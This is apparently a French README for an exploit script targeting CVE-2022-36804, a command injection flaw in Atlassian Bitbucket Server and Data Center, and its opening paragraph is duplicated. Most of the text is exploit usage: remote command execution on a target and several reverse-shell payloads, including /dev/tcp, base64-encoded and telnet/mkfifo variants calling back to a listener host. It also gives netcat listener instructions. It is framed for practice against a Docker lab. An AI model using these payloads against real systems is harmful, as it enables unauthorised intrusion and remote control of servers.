
Une vulnérabilité critique d'injection de commande a été découverte dans plusieurs points de terminaison API des serveurs Atlassian Bit bucket Server et Data Center. Cette vulnérabilité affecte toutes les versions de Bitbucket Server et Data Center publiées avant les versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 et <8.3.1.
Une vulnérabilité critique d'injection de commandes a été trouvée dans plusieurs points de terminaison API de l'Atlassian Bit bucket Server et Data center. Cette vulnérabilité affecte toutes les versions de Bitbucket Server et Data Center publiées avant les versions <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2>, et <8.3.1>
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
Remplacez 172.17.0.3 par votre adresse IP locale
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
Démarrez un écouteur netcat avec :
nc -lvp 4444
Convertissez /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 en base64 en cas d'erreur d'exécution du payload.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
Si vous rencontrez toujours une erreur, exécutez la commande ci-dessous :
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
Il est recommandé d'installer une version vulnérable de Bitbucket Server sur une machine Windows/Linux pour vous entraîner. Il sera facile d'obtenir un reverse shell par rapport aux images Docker.
De plus amples informations sont disponibles ici